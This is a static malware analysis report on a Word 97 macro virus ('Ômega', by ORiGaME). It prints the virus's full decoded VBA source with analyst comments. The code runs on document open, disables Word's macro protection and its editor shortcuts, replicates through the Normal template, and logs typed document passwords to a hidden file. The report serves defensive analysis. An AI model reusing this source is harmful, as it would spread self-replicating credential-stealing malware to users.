Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 13c06617a88cf9ff…

MALICIOUS

Office (OLE)

60.0 KB Created: 2000-01-11 21:41:00 Authoring application: Microsoft Word 8.0 (Word 97 — consistent with the self-identifying "Word97.Macro" string in the extracted macro below) First seen: 2012-06-14
MD5: 816a3b7779c74653ef773c378966c87e SHA-1: 38dfeda757f538dfdc5e20831f1559e22218c1a4 SHA-256: 13c06617a88cf9ffb0cc122facfa79abf7b4a643e3169d742d0889697973347d
120 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic — additional techniques supported directly by the extracted macro source below (not part of the engine's original mapping): T1137.001 Office Template Macros (Infecta copies the 'Ômega' and 'PassBox' modules into the Normal template and silently saves it), T1562.001 Disable or Modify Tools (Options.VirusProtection = False, Cancel key and Alt+F8/Alt+F11 disabled), T1056.002 GUI Input Capture (PassBox password prompt written to C:\IO.SDX)

The sample is a legacy Word 97 document whose VBA module 'Ômega' defines an 'AutoOpen' procedure, so the code runs automatically when the document is opened. The extracted source is a classic self-replicating macro virus rather than a downloader: Infecta disables Word's macro virus protection (Options.VirusProtection = False), the Cancel key and the Alt+F8/Alt+F11 shortcuts, then copies the 'Ômega' and 'PassBox' modules between the active document and the Normal template (saving the document in template format and saving Normal.dot without prompting), which gives it persistence on the host and lets it infect documents opened afterwards. The 'SE_PASSWORD_ARCHIVE_LURE' heuristic most plausibly fires on the PassBox form: if the open document is password-protected the macro prompts the user for the password, and Grava appends the document path and the typed value to C:\IO.SDX, which it then marks read-only, hidden and system — local credential harvesting rather than an encrypted-archive delivery lure. The document's visible text was not reviewed here, so the archive-lure reading is unconfirmed. The remaining payload (Tempo) inserts an animated 'ÔMEGA / By ORiGaME' banner at the top of the document on a pseudo-random subset of runs, and an empty ViewVBCode procedure is consistent with intercepting Word's built-in Visual Basic Editor command to hinder inspection. No network activity, dropped executables or parser-vulnerability exploitation appear in the recovered portion of the macro source.

Heuristics 4

  • Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE
    Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note: the "no modern VBA project was recovered" statement conflicts with the extracted artifact below (macros.bas, 15,473 bytes of VBA source decoded by olevba); treat OLE_VBA_MACROS / OLE_VBA_AUTOOPEN as the authoritative macro findings and this marker as corroborating evidence only.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 15473 bytes
SHA-256: 6b253b57881b304d61073046622e1e3517b4dfbcbfbe467fe2ce90733c9f9823
Preview script
First 1,000 lines of the extracted script. The listing is an evidentiary artifact shown verbatim — do not execute it. The preview is cut off inside the 'PassBox' UserForm module, so the form's control handlers (which presumably call Analise) are not visible here.
Attribute VB_Name = "Ômega"
' Entry point: 'AutoOpen' is a Word auto-macro, so Word runs this
' procedure when the document is opened (with macros enabled).
' Every error is swallowed by the GoTo Final handler, so a failure in
' one stage does not stop the document from opening normally.
Sub AutoOpen()
On Error GoTo Final

' Stage 1: disable protections and replicate to/from Normal template.
Infecta
' Stage 2: add a hidden menu entry pointing at the Show procedure.
Rotula
' Stage 3: visible payload (banner inserted on some runs).
Tempo

Final:
End Sub
' Replication / defense-evasion routine.
' 1. Silences Word UI feedback and turns off macro virus protection.
' 2. Disables the Cancel key and the Alt+F8 / Alt+F11 shortcuts in the
'    Normal template so the user cannot easily reach the Macros dialog
'    or the VBA editor.
' 3. Copies the 'Ômega' and 'PassBox' modules in whichever direction is
'    missing: Normal -> document (re-infection of a clean document from
'    an infected Normal) or document -> Normal (initial host infection).
' 4. If the open document is password-protected, shows the PassBox form
'    (see Analise / Grava for what happens with the typed value).
' All errors jump to Final, so partial failures are silent.
Sub Infecta()
On Error GoTo Final
       
   ' Hide screen redraws and suppress Word dialogs/prompts.
   Application.ScreenUpdating = False
   Application.DisplayAlerts = wdAlertsNone

   ' WordBasic call; argument 0 presumably re-enables auto-macros
   ' (the WordBasic DisableAutoMacros 0 form) — confirm against Word 97 docs.
   WordBasic.DisableAutoMacros 0
   ' Turns off Word 97's "Macro virus protection" warning (T1562.001).
   Options.VirusProtection = False
   
   ' Prevent Esc / Ctrl+Break from interrupting the macro.
   Application.EnableCancelKey = wdCancelDisabled
   
   ' Key bindings are changed in the Normal template, so they persist
   ' across sessions once Normal.dot is saved (see SaveNormalPrompt below).
   CustomizationContext = NormalTemplate
   ' Alt+F8 = Macros dialog; Alt+F11 = Visual Basic Editor.
   FindKey(BuildKeyCode(wdKeyAlt, wdKeyF8)).Disable
   FindKey(BuildKeyCode(wdKeyAlt, wdKeyF11)).Disable
   

   Set ActiveDoc = ActiveDocument
   ' GlobalDoc is assigned but never read in this routine.
   Set GlobalDoc = NormalTemplate

   DocumentInstalled = False
   GlobalInstalled = False
   
   ' Is the 'Ômega' module already present in the active document?
   For I = 1 To ActiveDocument.VBProject.VBComponents.Count
      If ActiveDocument.VBProject.VBComponents(I).Name = "Ômega" Then
         DocumentInstalled = True
      End If
   Next

   ' Is the 'Ômega' module already present in the Normal template?
   For J = 1 To NormalTemplate.VBProject.VBComponents.Count
      If NormalTemplate.VBProject.VBComponents(J).Name = "Ômega" Then
         GlobalInstalled = True
      End If
   Next
   
      ' Normal -> document: copies both modules, then re-saves the
      ' document under its own name in template format (wdFormatTemplate).
      If DocumentInstalled = False Then
         Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="Ômega", Object:=wdOrganizerObjectProjectItems
         ActiveDoc.SaveAs FileName:=ActiveDoc.FullName, FileFormat:=wdFormatTemplate
         Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="PassBox", Object:=wdOrganizerObjectProjectItems
         ActiveDoc.SaveAs FileName:=ActiveDoc.FullName, FileFormat:=wdFormatTemplate
      End If
            
     
      ' Document -> Normal: infects the global template (T1137.001);
      ' SaveNormalPrompt = False makes Word save Normal.dot without asking.
      If GlobalInstalled = False Then
         Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="Ômega", Object:=wdOrganizerObjectProjectItems
         Options.SaveNormalPrompt = False
         Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="PassBox", Object:=wdOrganizerObjectProjectItems
         Options.SaveNormalPrompt = False
      End If
     
      ' Only password-protected documents trigger the password prompt.
      If ActiveDocument.HasPassword = False Then GoTo Final
      PassBox.Show
       
Final:
    End Sub
' Adds a popup menu with a blank caption (" ") to the active menu bar,
' containing a single button "Ômega" whose OnAction runs the Show
' procedure. If a popup control with ID 1 and a blank caption already
' exists, the menu is not added again; any error (e.g. FindControl
' returning Nothing) falls through to CMB and creates the menu.
Sub Rotula()
On Error GoTo CMB

   Set FMB = CommandBars.FindControl(Type:=msoControlPopup, ID:=1)
 With FMB
    ' Already installed: nothing to do.
    If .Caption = " " Then GoTo Final
 End With

CMB:
    Set MB = CommandBars.ActiveMenuBar
    ' Inserted before the 11th control of the menu bar.
    Set NM = MB.Controls.Add(Type:=msoControlPopup, Before:=11)
  NM.Caption = " "
    Set BM = NM.Controls _
      .Add(Type:=msoControlButton, ID:=1)
  BM.Caption = "Ômega"
  BM.FaceId = 308
  ' Clicking the button runs Sub Show (the author-tag balloon).
  BM.OnAction = "Show"
          
Final:
        
End Sub
' Author tag: displays an Office Assistant balloon reading
' "Word97.Macro / By ORiGaME". Reached from the menu button added by
' Rotula. Useful for family attribution; no other effect.
Sub Show()
 Assistant.Visible = True
        With Assistant.NewBalloon
       .Icon = msoIconTip
       .Heading = "ÔMEGA"
       .Text = "       Word97.Macro  " + Chr(13) + Chr(13) + "        By ORiGaME"
       .Show
        End With

End Sub
' Handler for the PassBox form (the form's control code that calls this
' is outside the visible listing — presumed, not confirmed).
' Empty input: closes the document and dismisses the form.
' Non-empty input: hands the typed value to Grava, which logs it to disk.
Sub Analise()
If PassBox.TextBox1 = "" Then
   ActiveDocument.Close
   Unload PassBox
   Else
   Grava
End If

End Sub

' Credential harvesting: appends the document path and the password typed
' into PassBox to C:\IO.SDX. The file attributes are cleared first so the
' append succeeds, then set to 1 + 2 + 4 (ReadOnly + Hidden + System) to
' hide the log. Nothing validates the password against the document; the
' value is written as typed. IOC: C:\IO.SDX with "Path = " / "Password = "
' lines. On Error Resume Next makes every failure silent.
Sub Grava()
On Error Resume Next
SetAttr "C:\IO.SDX", 0
Open "C:\IO.SDX" For Append As #1
Print #1, "Path = " + ActiveDocument.FullName
Print #1, "Password = " + PassBox.TextBox1
Print #1, " "
Close #1
' ReadOnly (1) + Hidden (2) + System (4).
SetAttr "C:\IO.SDX", 1 + 2 + 4

Unload PassBox
' Restores the alerts that Infecta switched off.
Application.DisplayAlerts = wdAlertsAll

End Sub

' Empty procedure named after Word's built-in ViewVBCode command
' (Tools > Macro > Visual Basic Editor). A macro with a built-in
' command's name takes precedence over that command, so this is
' consistent with a stealth measure that makes the editor command do
' nothing — a common macro-virus technique; intent is inferred from the
' name, not demonstrated by the (empty) body.
Sub ViewVBCode()

End Sub

' Visible payload. Fires only when the current weekday (1-7) equals a
' pseudo-random value in 1..7 — roughly one run in seven, though Rnd is
' never seeded with Randomize here, so the sequence may repeat across
' sessions. When it fires, inserts an "ÔMEGA / By ORiGaME ©" banner at
' the very start of the document in 50pt Impact with colour index 9,
' text animation 6 and a shadow. Errors are swallowed via Final.
Sub Tempo()
On Error GoTo Final
If WeekDay(Now()) = Int(Rnd() * 7 + 1) Then

' Zero-length range at the document start; InsertBefore prepends text.
Set OM = ActiveDocument.Range(Start:=0, End:=0)
 With OM
 .InsertBefore "ÔMEGA" & Chr(13) & "By ORiGaME ©"
 .Font.Name = "Impact"
 .Font.Size = 50
 .Font.ColorIndex = 9
 .Font.Animation = 6
 .Font.Shadow = 1
 End With
End If

Final:
End Sub

Attribute VB_Name = "PassBox"
Attribute VB_Base = "0{D05F720C-5461-11CE-920A-8AE360A51863}{D05F7201-5461-11CE-920A-8AE360A51863}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False































... (truncated)